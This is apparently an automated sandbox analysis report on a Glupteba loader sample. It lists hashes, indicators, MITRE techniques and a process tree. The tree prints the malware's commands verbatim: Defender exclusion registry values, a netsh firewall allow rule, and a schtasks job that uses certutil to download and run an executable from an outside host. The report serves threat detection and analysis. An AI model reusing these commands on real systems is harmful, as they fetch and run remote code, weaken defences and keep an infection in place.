glupteba | a33db8692edff6c5467b65e4efc9fc7b0c2875871866ebbd078f303d06dab19f

Analysis

max time kernel
228s
max time network
253s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
24/12/2023, 22:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1618555f0ea0ec58bd442979d6626818.exe
Size

4.4MB
MD5

1618555f0ea0ec58bd442979d6626818
SHA1

ede27429f62ddd530ba1f2d291d080c4607b7913
SHA256

a33db8692edff6c5467b65e4efc9fc7b0c2875871866ebbd078f303d06dab19f
SHA512

9e7b1a9bcf1fc993be2d864153bfd7499c5d2a6fd48599885936a9dc4d6d6199286fcf49088734ca51bd3013c43de0ba69493a844d37135613cb03fde4c9d430
SSDEEP

98304:1Etw78UdTCkpRienHuP/IpEiEA7DJTL+9SbHvqir:1KyTCkpjnY/OEDEBx7vqir

Score

10^/10

glupteba metasploit backdoor discovery dropper evasion loader persistence trojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 20 IoCs

resource	yara_rule
behavioral1/memory/2044-2-0x0000000002B70000-0x0000000003496000-memory.dmp	family_glupteba
behavioral1/memory/2044-3-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2044-4-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2044-5-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2044-7-0x0000000002B70000-0x0000000003496000-memory.dmp	family_glupteba
behavioral1/memory/2044-8-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2044-9-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2044-10-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2004-13-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2004-14-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2004-18-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/2004-26-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/992-42-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/992-43-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/992-45-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/992-46-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/992-47-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/992-58-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral1/memory/1832-59-0x0000000140000000-0x00000001405E8000-memory.dmp	family_glupteba
behavioral1/memory/992-62-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Windows security bypass 2 TTPs 10 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	1618555f0ea0ec58bd442979d6626818.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\DivineDream = "0"	1618555f0ea0ec58bd442979d6626818.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	1618555f0ea0ec58bd442979d6626818.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	1618555f0ea0ec58bd442979d6626818.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	1618555f0ea0ec58bd442979d6626818.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	1618555f0ea0ec58bd442979d6626818.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	1618555f0ea0ec58bd442979d6626818.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	1618555f0ea0ec58bd442979d6626818.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\1618555f0ea0ec58bd442979d6626818.exe = "0"	1618555f0ea0ec58bd442979d6626818.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	1618555f0ea0ec58bd442979d6626818.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
1784	netsh.exe

Executes dropped EXE 2 IoCs

pid	Process
992	csrss.exe
1832	patch.exe

Loads dropped DLL 5 IoCs

pid	Process
2004	1618555f0ea0ec58bd442979d6626818.exe
2004	1618555f0ea0ec58bd442979d6626818.exe
852	Process not Found
1832	patch.exe
1832	patch.exe

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	1618555f0ea0ec58bd442979d6626818.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\DivineDream = "0"	1618555f0ea0ec58bd442979d6626818.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	1618555f0ea0ec58bd442979d6626818.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	1618555f0ea0ec58bd442979d6626818.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\1618555f0ea0ec58bd442979d6626818.exe = "0"	1618555f0ea0ec58bd442979d6626818.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	1618555f0ea0ec58bd442979d6626818.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	1618555f0ea0ec58bd442979d6626818.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	1618555f0ea0ec58bd442979d6626818.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	1618555f0ea0ec58bd442979d6626818.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	1618555f0ea0ec58bd442979d6626818.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Run\DivineDream = "\"C:\\Windows\\rss\\csrss.exe\""	1618555f0ea0ec58bd442979d6626818.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	1618555f0ea0ec58bd442979d6626818.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	1618555f0ea0ec58bd442979d6626818.exe
File created	C:\Windows\rss\csrss.exe	1618555f0ea0ec58bd442979d6626818.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20231225232522.cab	makecab.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3032	schtasks.exe
2340	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-422 = "Russian Standard Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-162 = "Central Standard Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time"	1618555f0ea0ec58bd442979d6626818.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time"	1618555f0ea0ec58bd442979d6626818.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	csrss.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2044	1618555f0ea0ec58bd442979d6626818.exe
2004	1618555f0ea0ec58bd442979d6626818.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2044	1618555f0ea0ec58bd442979d6626818.exe
Token: SeImpersonatePrivilege	2044	1618555f0ea0ec58bd442979d6626818.exe
Token: SeSystemEnvironmentPrivilege	992	csrss.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2004 wrote to memory of 2364	2004	1618555f0ea0ec58bd442979d6626818.exe	31
PID 2004 wrote to memory of 2364	2004	1618555f0ea0ec58bd442979d6626818.exe	31
PID 2004 wrote to memory of 2364	2004	1618555f0ea0ec58bd442979d6626818.exe	31
PID 2004 wrote to memory of 2364	2004	1618555f0ea0ec58bd442979d6626818.exe	31
PID 2364 wrote to memory of 1784	2364	cmd.exe	33
PID 2364 wrote to memory of 1784	2364	cmd.exe	33
PID 2364 wrote to memory of 1784	2364	cmd.exe	33
PID 2004 wrote to memory of 992	2004	1618555f0ea0ec58bd442979d6626818.exe	34
PID 2004 wrote to memory of 992	2004	1618555f0ea0ec58bd442979d6626818.exe	34
PID 2004 wrote to memory of 992	2004	1618555f0ea0ec58bd442979d6626818.exe	34
PID 2004 wrote to memory of 992	2004	1618555f0ea0ec58bd442979d6626818.exe	34

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\1618555f0ea0ec58bd442979d6626818.exe
"C:\Users\Admin\AppData\Local\Temp\1618555f0ea0ec58bd442979d6626818.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2044
- C:\Users\Admin\AppData\Local\Temp\1618555f0ea0ec58bd442979d6626818.exe
  "C:\Users\Admin\AppData\Local\Temp\1618555f0ea0ec58bd442979d6626818.exe"
  2⤵
  - Windows security bypass
  - Loads dropped DLL
  - Windows security modification
  - Adds Run key to start application
  - Checks for VirtualBox DLLs, possible anti-VM trick
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2004
- - C:\Windows\system32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2364
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Modifies data under HKEY_USERS
      PID:1784
- - C:\Windows\rss\csrss.exe
    C:\Windows\rss\csrss.exe ""
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Modifies system certificate store
    - Suspicious use of AdjustPrivilegeToken
    PID:992
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:3032
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
      4⤵
      Creates scheduled task(s)
      PID:2340
  - - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
      "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1832

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231225232522.log C:\Windows\Logs\CBS\CbsPersist_20231225232522.cab
1⤵
- Drops file in Windows directory
PID:1780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

